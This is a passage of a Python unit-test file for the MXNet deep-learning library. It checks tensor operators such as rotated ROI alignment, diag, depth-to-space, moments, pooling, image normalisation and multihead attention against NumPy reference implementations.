def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
@with_seed()
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
# k = -1 axis1=1, axis3=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@with_seed()
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@with_seed()
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
@with_seed()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
@with_seed()
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
@with_seed()
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
@with_seed()
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
@with_seed()
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
@with_seed()
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@with_seed()
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
@with_seed()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
@with_seed()
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
@with_seed()
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
@with_seed()
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
ok_(isinstance(ops, list))
ok_(len(ops) > 0)
ok_('Activation' in ops)
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
ok_(isinstance(operator_arguments, OperatorArguments))
ok_(operator_arguments.names == ['data', 'act_type'])
ok_(operator_arguments.types
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"])
ok_(operator_arguments.narg == 2)
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b.bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
@with_seed()
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=(1,))
assert s.shape == (1, 1)
def test_large_tensor_disabled_err_msg():
LARGE_X = 4300000000
MEDIUM_X = 1000000000
SMALL_Y = 1
shape = (2, LARGE_X)
def check_nd_array():
x = np.arange(0, LARGE_X)
assertRaises(MXNetError, mx.nd.array, x)
def check_nd_ones():
assertRaises(MXNetError, mx.nd.ones, shape)
def check_nd_zeros():
assertRaises(MXNetError, mx.nd.zeros, shape)
def check_nd_full():
val = 1
assertRaises(Exception, mx.nd.full, shape, val)
def check_nd_arange():
start = 0
stop = LARGE_X
assertRaises(Exception, mx.nd.arange, start, stop)
def check_nd_random():
shape = (2, LARGE_X)
def check_random_exp():
lam = 4
assertRaises(MXNetError, mx.nd.random_exponential, lam, shape)
def check_random_gamma():
alpha = 9
beta = 0.5
assertRaises(MXNetError, mx.nd.random_gamma, alpha, beta, shape)
def check_random_normal():
loc = 0
scale = 1
assertRaises(MXNetError, mx.nd.random_normal, loc, scale, shape)
def check_random_poisson():
lam = 4
assertRaises(MXNetError, mx.nd.random_poisson, alpha, lam, shape)
def check_random_randint():
low = 0
high = 1000000
assertRaises(MXNetError, mx.nd.random_randint, low, high, shape)
def check_random_uniform():
low = 0
hight = 1
assertRaises(MXNetError, mx.nd.random_uniform, alpha, beta, shape)
def check_multihead_attention_selfatt(dtype):
def convert_weight(F, q_weight, k_weight, v_weight, num_heads):
q_weight = F.reshape(q_weight, shape=(num_heads, -1, 0), reverse=True)
k_weight = F.reshape(k_weight, shape=(num_heads, -1, 0), reverse=True)
v_weight = F.reshape(v_weight, shape=(num_heads, -1, 0), reverse=True)
all_weights = F.concat(q_weight, k_weight, v_weight, dim=-2)
all_weights = F.reshape(all_weights, shape=(-1, 0), reverse=True)
return all_weights
def convert_bias(F, q_bias, k_bias, v_bias, num_heads):
q_bias = F.reshape(q_bias, shape=(num_heads, -1))
k_bias = F.reshape(k_bias, shape=(num_heads, -1))
v_bias = F.reshape(v_bias, shape=(num_heads, -1))
all_bias = F.stack(q_bias, k_bias, v_bias, axis=1)
all_bias = F.reshape(all_bias, shape=(-1,))
return all_bias
batch_size = 2
qkv_length = 7 # length of a sequence
qkv_dim = 9 # dimension of encoding
num_heads = 3 # number of attention head
head_dim = 5 # head size
out_dim = 13 * num_heads
qkv_units = num_heads * head_dim
arg_params = {
'qkv': mx.nd.array(np.random.rand(*(batch_size, qkv_length, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'k_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'v_weight': mx.nd.array(np.random.rand(*(qkv_units, qkv_dim)).astype(dtype) * 0.1, dtype=dtype),
'q_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'k_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'v_bias': mx.nd.array(np.random.rand(*(qkv_units,)).astype(dtype) * 0.1, dtype=dtype),
'out_weight': mx.nd.array(np.random.rand(*(out_dim, qkv_units)).astype(dtype) * 0.1, dtype=dtype),
'out_bias': mx.nd.array(np.random.rand(*(out_dim,)).astype(dtype) * 0.1, dtype=dtype),
}
qkv = mx.sym.Variable('qkv')
sonde = mx.sym.Variable('sonde')
q_weight = mx.sym.Variable('q_weight')
k_weight = mx.sym.Variable('k_weight')
v_weight = mx.sym.Variable('v_weight')
q_bias = mx.sym.Variable('q_bias')
k_bias = mx.sym.Variable('k_bias')
v_bias = mx.sym.Variable('v_bias')
out_weight = mx.sym.Variable('out_weight')
out_bias = mx.sym.Variable('out_bias')
qkv_weight = convert_weight(mx.sym, q_weight, k_weight, v_weight, num_heads)
qkv_bias = convert_bias(mx.sym, q_bias, k_bias, v_bias, num_heads)
qkv = mx.sym.transpose(qkv, axes=(1, 0, 2))
qkv_proj = mx.sym.FullyConnected(qkv, weight=qkv_weight, bias=qkv_bias, flatten=False,
num_hidden=qkv_units * 3, no_bias=False)
att_score = mx.sym.contrib.interleaved_matmul_selfatt_qk(
qkv_proj, heads=num_heads)
att_score = att_score + sonde
weighted_value = mx.sym.contrib.interleaved_matmul_selfatt_valatt(
qkv_proj, att_score, heads=num_heads)
output = mx.sym.FullyConnected(weighted_value, weight=out_weight, bias=out_bias, flatten=False,
num_hidden=out_dim, no_bias=False)
